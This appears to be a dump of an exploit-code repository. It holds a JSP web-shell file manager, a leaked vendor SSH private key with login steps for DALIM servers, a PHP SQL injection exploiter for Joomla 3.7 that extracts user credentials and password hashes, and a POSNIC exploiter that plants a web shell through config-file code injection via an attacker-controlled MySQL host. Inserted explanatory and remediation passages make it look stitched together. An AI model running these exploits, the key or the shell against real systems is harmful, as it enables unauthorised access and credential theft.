1789 | else if (filenames.length() > 0) filenames 1790 | .setLength(filenames.length() - 1); 1791 | link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" 1792 | + FOL_IMG + "[" + buf + "]"; 1793 | } 1794 | else if (entry[i].canRead()) { 1795 | link = ahref + 
"dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; 1796 | } 1797 | else link = FOL_IMG + "[" + buf + "]"; 1798 | } 1799 | else if (entry[i].isFile()) { //Entry is file 1800 | totalSize = totalSize + entry[i].length(); 1801 | fileCount = fileCount + 1; 1802 | if (entry[i].canRead()) { 1803 | dlink = ahref + "downfile=" + name + "\">Download"; 1804 | //If you click at the filename 1805 | if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" 1806 | + buf + ""; 1807 | else link = ahref + "file=" + name + "\">" + buf + ""; 1808 | if (entry[i].canWrite()) { // The file can be edited 1809 | //If it is a zip or jar File you can unpack it 1810 | if (isPacked(name, true)) elink = ahref + "unpackfile=" + name 1811 | + "\">Unpack"; 1812 | else elink = ahref + "editfile=" + name + "\">Edit"; 1813 | } 1814 | else { // If the file cannot be edited 1815 | //If it is a zip or jar File you can unpack it 1816 | if (isPacked(name, true)) elink = ahref + "unpackfile=" + name 1817 | + "\">Unpack"; 1818 | else elink = ahref + "editfile=" + name + "\">View"; 1819 | } 1820 | } 1821 | else { 1822 | link = buf; 1823 | } 1824 | } 1825 | String date = dateFormat.format(new Date(entry[i].lastModified())); 1826 | out.println(""); 1828 | if (entry[i].canRead()) { 1829 | out 1830 | .println(""); 1832 | } 1833 | else { 1834 | out 1835 | .println(""); 1836 | } 1837 | out.print(""); 1838 | if (entry[i].isDirectory()) out.print(""); 1839 | else { 1840 | out.print(""); 1842 | } 1843 | out.println(""); // The edit link (or view, depending) 1847 | } 1848 | }%> 1849 |
 "); 1735 | String name = URLEncoder.encode(entry[i].getAbsolutePath()); 1736 | String buf = entry[i].getAbsolutePath(); 1737 | out.println("  [" + buf + "]"); 1739 | out 1740 | .println("     
"); 1748 | out.println("  " + FOL_IMG + "[..]"); 1750 | out 1751 | .println("     
 " + link + " " 1841 | + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) 1844 | date + "" + // The date the file was created 1845 | dlink + "" + // The download link 1846 | elink + "
1850 | Select all 1851 |
1852 | 1853 | <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> 1854 | 1855 |
1857 | "> 1858 | 1859 | 1860 | 1862 |
1864 | 1865 | 1866 | 1867 | 1868 | 1869 | 1870 |
1873 | "> 1874 | 1875 | 1876 | 1878 |
1879 | <% if (NATIVE_COMMANDS){%> 1880 |
1881 | "> 1882 | 1883 | 1884 | 1885 |
<% 1886 | } 1887 | }%> 1888 |
1889 | 1890 | 1891 | <% 1892 | } 1893 | %> 1894 | -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/s.jsp: -------------------------------------------------------------------------------- 1 | test 2 | -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Apache-Tomcat-Text_interface-shell-upload/screenshot.png -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/sh3lls.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Apache-Tomcat-Text_interface-shell-upload/sh3lls.war -------------------------------------------------------------------------------- /DALIM-Software-web-applications_server/README.md: -------------------------------------------------------------------------------- 1 | ## Pre-defined SSH Private key for user daltomcat 2 | 3 | ### Summary 4 |
The DALIM Software web applications software stack ships with a pre-defined SSH private key for the user `daltomcat`.

When this software stack is installed on a Linux server, it creates a Linux user with the below mentioned configuration (in the /etc/passwd file):

`daltomcat:x:****:****:DALiM Tomcat Admin:/home/daltomcat:/bin/bash`

#### Abuse case

Because every installation trusts the same key pair, anyone holding the private key below can SSH as user `daltomcat` into any Linux server on which the DALIM Software web applications software stack is installed.

To exploit the issue, save the below mentioned SSH private key to your machine, set its permissions to 400 (`chmod 400 id_rsa`; OpenSSH refuses to use a private key that other users can read) and SSH to the target machine using the below mentioned command:

`ssh daltomcat@Server_IP -i id_rsa`

![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/DALIM-Software-web-applications_server/dal_exploit.png)

Any affected host should have this key removed from the `daltomcat` account's authorized_keys and, if key-based access is needed at all, a fresh key pair generated per installation.

#### SSH private key content

Below mentioned is the SSH private key for user account `daltomcat`:

```
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA28TZ+bYr2OIn4apSrM6Q9qPhWgkOokwyD/VadnMIordEX8he
36wLJFGyIzg7kWc/zbJ89CutJl6bteC0Tzv6bxl9wCNs1rEpW/eR4wDQRhUpc+pQ
KlSIhfJa0NOwlgFhol7CR+Hk/9H87pUlNh7vcY7sNH9uRG+CPdX9yuJKP1NZucF2
FKNaU2PhytlJl7/xJGsy69wsMFMxEfKhtZgTZN5sK+RbzNxuvJgwj3DmXusalksO
rpPf1DufqfRT2UvccdwyMh7Gun4CHU7TM8b4hkQO9NmOHI3GvSLcEtJv1lMQ7fLT
/1ocfR3BjVuB24gmGL54ODn+v9Dv7TI9sCay2QIBIwKCAQBLWW9OTRZY/RT86fB1
wypjMN+MlWQaY0RdPi2k9D15neuOjddioWLn4X7ngP56/tQMAq5/mfI5Cn6HgD3S
Be92jGWg9jPx1ldSu0f2DuhSiumkFdJXp/RLLoWJbSaZ1JaA0AgYpTiSOV4IqCoD
7Vlow0mrmWeib1/ar8S6lrpe2hzd5VrhmjuXd/S4t/P6yczfyjxU7wAqMPVJ5wJ9
XSWBaWwXnCt4FoLRIrFZeJzFvYLea+j0esYCd1uSe1e8wDQXlCjNENE28dgZWYKh
WJLTtvi80YaJeHLKUix4ZiNzf3oOW6SvScQsMKKBRbhXJz3ohk6F+Xlxei9Umhp0
k9WLAoGBAPgRo+8gOcbB+VjKvFGYJb1UupgZWC+lSVDNSZrLChypfSuYMjFGa4qv
UzzeRnLL8/CawuLuDjK9hsxndGx0/WUawCe1CYmlGJXgFNOe9tIN8yxVsA8axy6+
GWh0Vb96XsusrEFqCIi0JcS0dWV5xq9KvocuEwuGvQfDGZ2EBudpAoGBAOLLleiN
EmXCTKnlWcW5eEjtosAwIDwP+xTXxz+nk56smG/5gAES2eaAn8PBiqpSORbyzW73
dOuPg12B7XzTHd9nq+jRpDA1JAtIn5fo4yTkJeJ4cQvw0fPbmcc/Usj1wHaXZfJA
umzyv3g1MBgOOaznzYwDZKZYxN4eAdMCxfHxAoGAHFnJl6vpWIsycIwyx38aQYYG
skwKFBLjzrhgLvKiEed8BPtzc1iBUa2jHOYz79zLa/RuC05oBcyEbyHEKab4Y1OD
rMQ7mrPIS6SUqniRPJPhRuU4sUTjkFA9awX7K9N4jE4/knKEoeiz2/dd37YlVdyo
D3L63L7xCDON5h23pWsCgYEAz1sMt1xol40S5HnrrXZfWJ7Ar7b45nUC0TpPxSt/
pwQzmZOoO37zG+NQPfLH7C3rDarKdBVyNnSVXM6P/RjK2uJxSeQ+V/YSU3WZOm6G
iCEMsc00KCyisxHrrtrPWKYsTytV5M13PwnToRqvoPcQKQ5yySesetTRQBtvYdam
WYsCgYEAkuxFor2DGF05bUSLgLKFj2hJ7ZQwkxIXOU/MKt52spL+KHGc/LuCq9Jv
y43P5UdThFyuS10NBe7iHmbaoLEaRxlO9M38vMIldHDm2nAeQ5AwVVeSEWoSsm2O
0Waof8fgaW21AMhqudoU1pAvfBNGah7SiKqP/yXjaceWTpSALb0=
-----END RSA PRIVATE KEY-----
```

--------------------------------------------------------------------------------
/DALIM-Software-web-applications_server/dal_exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/DALIM-Software-web-applications_server/dal_exploit.png
--------------------------------------------------------------------------------
/DALIM-Software-web-applications_server/id_rsa:
--------------------------------------------------------------------------------
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA28TZ+bYr2OIn4apSrM6Q9qPhWgkOokwyD/VadnMIordEX8he
36wLJFGyIzg7kWc/zbJ89CutJl6bteC0Tzv6bxl9wCNs1rEpW/eR4wDQRhUpc+pQ
KlSIhfJa0NOwlgFhol7CR+Hk/9H87pUlNh7vcY7sNH9uRG+CPdX9yuJKP1NZucF2
FKNaU2PhytlJl7/xJGsy69wsMFMxEfKhtZgTZN5sK+RbzNxuvJgwj3DmXusalksO
rpPf1DufqfRT2UvccdwyMh7Gun4CHU7TM8b4hkQO9NmOHI3GvSLcEtJv1lMQ7fLT
/1ocfR3BjVuB24gmGL54ODn+v9Dv7TI9sCay2QIBIwKCAQBLWW9OTRZY/RT86fB1
wypjMN+MlWQaY0RdPi2k9D15neuOjddioWLn4X7ngP56/tQMAq5/mfI5Cn6HgD3S
Be92jGWg9jPx1ldSu0f2DuhSiumkFdJXp/RLLoWJbSaZ1JaA0AgYpTiSOV4IqCoD
7Vlow0mrmWeib1/ar8S6lrpe2hzd5VrhmjuXd/S4t/P6yczfyjxU7wAqMPVJ5wJ9
XSWBaWwXnCt4FoLRIrFZeJzFvYLea+j0esYCd1uSe1e8wDQXlCjNENE28dgZWYKh
WJLTtvi80YaJeHLKUix4ZiNzf3oOW6SvScQsMKKBRbhXJz3ohk6F+Xlxei9Umhp0
k9WLAoGBAPgRo+8gOcbB+VjKvFGYJb1UupgZWC+lSVDNSZrLChypfSuYMjFGa4qv
UzzeRnLL8/CawuLuDjK9hsxndGx0/WUawCe1CYmlGJXgFNOe9tIN8yxVsA8axy6+
GWh0Vb96XsusrEFqCIi0JcS0dWV5xq9KvocuEwuGvQfDGZ2EBudpAoGBAOLLleiN
EmXCTKnlWcW5eEjtosAwIDwP+xTXxz+nk56smG/5gAES2eaAn8PBiqpSORbyzW73
dOuPg12B7XzTHd9nq+jRpDA1JAtIn5fo4yTkJeJ4cQvw0fPbmcc/Usj1wHaXZfJA
umzyv3g1MBgOOaznzYwDZKZYxN4eAdMCxfHxAoGAHFnJl6vpWIsycIwyx38aQYYG
skwKFBLjzrhgLvKiEed8BPtzc1iBUa2jHOYz79zLa/RuC05oBcyEbyHEKab4Y1OD
rMQ7mrPIS6SUqniRPJPhRuU4sUTjkFA9awX7K9N4jE4/knKEoeiz2/dd37YlVdyo
D3L63L7xCDON5h23pWsCgYEAz1sMt1xol40S5HnrrXZfWJ7Ar7b45nUC0TpPxSt/
pwQzmZOoO37zG+NQPfLH7C3rDarKdBVyNnSVXM6P/RjK2uJxSeQ+V/YSU3WZOm6G
iCEMsc00KCyisxHrrtrPWKYsTytV5M13PwnToRqvoPcQKQ5yySesetTRQBtvYdam
WYsCgYEAkuxFor2DGF05bUSLgLKFj2hJ7ZQwkxIXOU/MKt52spL+KHGc/LuCq9Jv
y43P5UdThFyuS10NBe7iHmbaoLEaRxlO9M38vMIldHDm2nAeQ5AwVVeSEWoSsm2O
0Waof8fgaW21AMhqudoU1pAvfBNGah7SiKqP/yXjaceWTpSALb0=
-----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/Joomla-SQL-Injection-3.7/3xpl0173r.php:
--------------------------------------------------------------------------------
[PHP preamble and HTML head with the page title "--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--" and the `$head` stylesheet string; the markup was lost in extraction, and only `echo $head;` followed by the opening `echo '` of the banner below survive.]
--==[[ Mannu ]]==--
--==[[ Joomla SQL Injection exploiter By Team INDIShEll ]]==--

####################################################################################################################################
--==[[ Greetz to ]]==--
Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals,
cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256,
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash
--==[[ Love to ]]==--
My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP,
Mohit, Ffe, Ashish, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don (Deepika kaushik)
--==[[ Interface Designed By ]]==--
GCE College ke DON :D
####################################################################################################################################
';

[The next part of 3xpl0173r.php is lost in extraction: the `unhex($hex)` helper (its `for($i=0;$i<...` loop is cut off at the `<`), the HTML form captioned "--==[[ code for India ]]==--" that takes the target, the `data()` cURL helper, and the code that builds the injectable URL `$inject` and reads the users table name `$table_name` from the target. The surviving tail of that block prints the table name: `echo '... '.$table_name;`]

```php
$prefix=explode('_',$table_name);   // Joomla table prefix, used to reach <prefix>_users
$total_char=10;                     // 10 characters per request: the XPATH error text that
$start=1;                           // extractvalue() raises is truncated, so the hash is read in chunks
$loop_end=false;
$ddd='';                            // accumulated password hash

while($loop_end!=true)
{
    // error-based extraction: the ~~~ markers delimit the substring inside the MySQL error message
    $payload2='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'.$start.','.$total_char.'),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
    $final_url=$inject.$payload2;

    $data_extracted=data($final_url);
    $de0=explode("~~~", $data_extracted);
    $de1=explode("~~~", $de0[1]);
    $ddd.=trim($de1[0]);
    if(trim($de1[0])=='')
    {
        $loop_end=true;             // empty chunk: the whole hash has been read
        break;
    }
    $start=$start+10;
}

$username='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$username;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$user_name=trim($de1[0]);

$email='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$email;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$email=trim($de1[0]);

$dbuser='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbuser;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_user=trim($de1[0]);

$dbname='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbname;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_name=trim($de1[0]);

$dbversion='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbversion;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_version=trim($de1[0]);

if($email!='' || $user_name!='' || $ddd!='')
{
    echo 'Target '.$target.' has been injected successfully, find username, email and password given below';
    // results table (the HTML table markup around these lines was lost in extraction)
    echo 'Database username is -> '.$db_user;
    echo 'Database name is -> '.$db_name;
    echo 'Database version is -> '.$db_version;
    echo 'Username is -> '.$user_name;
    echo 'Email is -> '.$email;
    echo 'Password hash is -> '.$ddd;
}
}
?>
```

--------------------------------------------------------------------------------
/Joomla-SQL-Injection-3.7/README.md:
--------------------------------------------------------------------------------
This PHP script exploits the SQL injection vulnerability in Joomla 3.7.

To use this script, the system must have PHP installed on it.
The script crafts its HTTP requests using PHP-cURL.

Just type the target domain that has the Joomla 3.7 installation.

--==[[Greetz to]]==--

Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell, Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,shafoon, Rehan manzoor, cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk, D2 and rest of TEAM INDISHELL

--==[[Love to]]==--

My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP,rafay baloch, D3, Nag256, Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
--------------------------------------------------------------------------------
/Joomla-SQL-Injection-3.7/SQL Injection joomla.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Joomla-SQL-Injection-3.7/SQL Injection joomla.png
--------------------------------------------------------------------------------
/MSSQL Error-Based SQL Injection Order by clause/Error based SQL Injection in “Order By” clause (MSSQL).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/MSSQL Error-Based SQL Injection Order by clause/Error based SQL Injection in “Order By” clause (MSSQL).pdf
--------------------------------------------------------------------------------
/MSSQL Error-Based SQL Injection Order by clause/README.md:
--------------------------------------------------------------------------------
This paper is about exploiting error-based SQL injection in the "Order By" clause (MSSQL).
--------------------------------------------------------------------------------
/POSNIC/SQL-Injection.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/POSNIC/SQL-Injection.php
--------------------------------------------------------------------------------
/POSNIC/posnic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/POSNIC/posnic.png
--------------------------------------------------------------------------------
/POSNIC/posnic_exploit_code.php:
--------------------------------------------------------------------------------
[PHP preamble and HTML head with the page title "--==[[IndiSh3LL]]==--" and the `$head` stylesheet string; the markup was lost in extraction, and only `echo $head;` followed by the opening `echo '` of the banner below survive.]
--==[[ POSNIC, PHP stock management script Remote code execution exploiter ]]==--
--==[[ With Love from Team Indishell ]]==--

####################################################################################################################################
--==[[ Greetz to ]]==--
Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, Local root indishell, Irfninja indishell,
Reborn India, L0rd Crus4d3r, cool toad, Hackuin, Alicks, Gujjar PCP, Bikash, Dinelson Amine, Th3 D3str0yer, SKSking, rad paul, Godzila, mike waals, zoo zoo, cyber warrior, Neo hacker ICA,
cyber gladiator, 7he Cre4t0r, Cyber Ace, Golden boy INDIA, Ketan Singh, Yash, Aneesh Dogra, AR AR, saad abbasi, hero, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk and rest of TEAM INDISHELL
--==[[ Love to ]]==--
My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP,
Mohit, Ffe, Ashish, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don (Deepika kaushik)
--==[[ Interface Designed By ]]==--
GCE College ke DON :D
####################################################################################################################################
[Form part of the banner string, markup lost in extraction: the caption "--==[[ code for India,Hack for India,Die for India ]]==--", the note "Please Read it before using this code.", and three inputs labelled "target URL: -", "Attacker controlled Remote MySQL host: -" and "Attacker controlled Remote MySQL account username: -" (read below as $_POST['tar'], $_POST['mhost'] and $_POST['muser']), plus the submit button that sets $_POST['launch'].]
';

```php
function request($lu,$payload)
{
    // POST $payload (a raw x-www-form-urlencoded string) to $lu; the response is discarded
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $lu);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "$payload");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_exec($ch);
    curl_close($ch);
}

function shell_check($url)
{
    // HEAD request; true when the URL answers 200, i.e. the dropped shell is reachable
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_NOBODY, true);
    $result = curl_exec($curl);
    $ret = false;
    if ($result !== false) {
        $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
        if ($statusCode == 200) {
            $ret = true;
        }
    }
    curl_close($curl);
    return $ret;
}

function access($lu)
{
    // plain GET, returns the response body
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $lu);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
    $result['EXE'] = curl_exec($ch);
    curl_close($ch);
    return $result['EXE'];
}

if(isset($_POST['launch']))
{
    $tar=$_POST['tar'];
    $mhost=trim($_POST['mhost']);
    $muser=trim($_POST['muser']);

    $injecturl=$tar.'/setup_page.php';
    $exploiturl=$tar.'/config.php';

    /////////////////////////////////////
    // here, we are injecting the config file: the password value closes the string
    // literal that setup_page.php writes into config.php and appends
    // file_put_contents($_POST[2],$_POST[3]); select_box is the database name on the
    // attacker's MySQL server, hardcoded to "owned"
    /////////////////////////////////////
    $hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL";
    request($injecturl,$hex_it);

    /////////////////////////////////////////
    // here we go, let's drop the shell on the server
    /////////////////////////////////////////
    $code='';   // the PHP source written to mannu.php was lost in extraction (it begins with "<?php")
    $post_request='2=mannu.php&3='.$code;
    request($exploiturl,$post_request);     // config.php now acts as a file writer: $_POST[2] = name, $_POST[3] = content
    access($tar.'/mannu.php');              // run the dropped file once; ica.php is expected to exist afterwards
    $shell_link=shell_check($tar.'/ica.php');
    if($shell_link==True)
    {
        echo 'check your shell at This link ';   // the link markup was lost in extraction
    }
}
?>
```

--------------------------------------------------------------------------------
/POSNIC/readme.md:
--------------------------------------------------------------------------------
This script exploits a remote code execution issue in the POSNIC PHP stock management script.
The vulnerability is in the setup_page.php code: even when the CMS has already been installed, setup_page.php still lets any user reinstall it.

During the installation process the script first tries to connect to the MySQL server supplied by the user in the installation form; if it can connect (to a locally or remotely hosted server), the installation proceeds.

The script saves the MySQL server host, username and password in the config.php file.

An attacker can take advantage of this process to write PHP code into config.php: the values are written into PHP source without escaping, so a password that closes the string literal is executed as code the next time config.php is included.

To do this, the attacker needs to set up a MySQL server on a machine, and that MySQL server must be configured to accept connections from remote IPs (which can be done easily by changing a parameter in the my.cnf file).
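To make the mechanism concrete, an added example (not POSNIC's code and not the repository's) that models the config.php write in Python: a writer that interpolates the installer's values into PHP source the way the vulnerable installer effectively does, a hardened writer that emits a PHP single-quoted literal with backslash and quote escaped (the output PHP's var_export() would give), and a line parser that finds where the string literal ends, so the password from this readme visibly turns into code in the first case and stays an inert string in the second. The variable names $host/$username/$password and the attacker host 10.0.0.5 are assumptions for the example.

```python
"""Model of POSNIC's config.php write and the password-field breakout from this readme (added example)."""
import re

# Password value from the readme: closes the double-quoted PHP literal, appends code, comments out the rest.
PAYLOAD = '";file_put_contents($_POST[2],$_POST[3]);//'


def vulnerable_config(host, user, password):
    """Installer style: values dropped into PHP source by plain interpolation (variable names assumed)."""
    return (
        "<?php\n"
        f'$host = "{host}";\n'
        f'$username = "{user}";\n'
        f'$password = "{password}";\n'
    )


def php_single_quoted(value):
    """Render value as a PHP single-quoted literal. Only backslash and the quote are special there,
    so no input can terminate the literal (same output as PHP's var_export() for a string)."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def hardened_config(host, user, password):
    """Same file, every value passed through php_single_quoted()."""
    return (
        "<?php\n"
        f"$host = {php_single_quoted(host)};\n"
        f"$username = {php_single_quoted(user)};\n"
        f"$password = {php_single_quoted(password)};\n"
    )


def parse_assignment(line):
    """Split a `$name = <quoted literal>...;` PHP line into (name, literal value, trailing code).
    Walks the literal the way the PHP lexer does for the quote character in use: a backslash
    escapes that quote or another backslash; other escapes (\\n, \\$, ...) are left undecoded
    because only the end of the literal matters here. Trailing code is whatever follows the
    closing quote, minus the terminating ';'."""
    m = re.match(r'\s*\$(\w+)\s*=\s*(["\'])', line)
    if not m:
        return None
    name, quote, i = m.group(1), m.group(2), m.end()
    value = []
    while i < len(line) and line[i] != quote:
        if line[i] == "\\" and i + 1 < len(line) and line[i + 1] in ("\\", quote):
            value.append(line[i + 1])
            i += 2
        else:
            value.append(line[i])
            i += 1
    rest = line[i + 1:].strip()
    trailing = rest[1:].strip() if rest.startswith(";") else rest
    return name, "".join(value), trailing


def injected_assignments(config_text):
    """(name, code) for every config line that carries code after its string literal."""
    hits = []
    for line in config_text.splitlines():
        parsed = parse_assignment(line)
        if parsed and parsed[2]:
            hits.append((parsed[0], parsed[2]))
    return hits


def demo():
    """Write both variants with the readme's payload and report what the PHP parser would see."""
    vuln = vulnerable_config("10.0.0.5", "owned", PAYLOAD)   # attacker MySQL host: constructed
    safe = hardened_config("10.0.0.5", "owned", PAYLOAD)
    return {
        "vulnerable": injected_assignments(vuln),
        "hardened": injected_assignments(safe),
        "hardened_password": parse_assignment(safe.splitlines()[3])[1],
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, "->", val)
```

In the vulnerable file the password line becomes `$password = "";file_put_contents($_POST[2],$_POST[3]);//";`, so the parser reports `file_put_contents(...)` as code outside the literal; in the hardened file the whole payload is the literal's value and nothing follows it. Escaping only removes the code injection; the reinstall path itself (setup_page.php staying reachable after installation) still has to be closed, otherwise an attacker can at least repoint the application at a database they control.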
To configure the MySQL server to accept remote connections, open the my.cnf file and do the steps below:

-> comment out skip-networking as well as bind-address (if either is present in my.cnf), i.e. change the line

skip-networking
to
# skip-networking

and

bind-address = some_ip
to
#bind-address = some_ip

Save the my.cnf file and reload/restart the MySQL server; it will now accept remote connections from any IP.

Now you need to create a MySQL user and database. Follow these steps, otherwise the script won't be able to connect to the MySQL server.

Create the database in the MySQL server by issuing the following command:

create database owned;

(The exploit script hardcodes the database name in its POST body as `select_box=owned`, so keep the name `owned` unless you change the script as well.)

Once the database has been created, we need to create a user account that satisfies these conditions:

user account name = whatever you want (I am going to use 'owned')

user account password = ";file_put_contents($_POST[2],$_POST[3]);//

host from which this user will be allowed = %

Let's suppose the server where the POSNIC script is installed has the IP 192.168.56.102.

The MySQL command that creates the user account is:

grant all on database_name.* to 'username_of_user'@'%' IDENTIFIED BY 'user account password';

In my case:

database_name = owned

user account name = owned

user account password = ";file_put_contents($_POST[2],$_POST[3]);//

so the final command is:

grant all on owned.* to 'owned'@'%' IDENTIFIED BY '";file_put_contents($_POST[2],$_POST[3]);//';

Note that the host part has to be quoted ('%'); a bare % is a syntax error. On MySQL 8 the GRANT statement no longer accepts IDENTIFIED BY, so create the account first with CREATE USER 'owned'@'%' IDENTIFIED BY '";file_put_contents($_POST[2],$_POST[3]);//'; and then run grant all on owned.* to 'owned'@'%';.

After creating the user account successfully, run the exploit code on your machine and fill in the information:

-> target URL, i.e. the path to the POSNIC script (in my case http://127.0.0.1/stock/)
-> attacker-controlled MySQL host IP (the IP of the server where the attacker has configured the MySQL server)
-> user account name on the attacker-controlled MySQL server (in my case 'owned')

--==[[ Greetz To ]]==--

Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash

--==[[Love to]]==--

My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# exploit-code-by-me
This repository contains exploit code I developed for vulnerabilities in various scripts.
--------------------------------------------------------------------------------
/RFI-PHP-SMB_server/README.md:
--------------------------------------------------------------------------------

# Configure SAMBA Server with anonymous browse access

This is the share a PHP remote file inclusion on a Windows target can include over SMB through a UNC path such as `\\attacker_host\ica\file.php`; guest access means the target needs no credentials to read it.

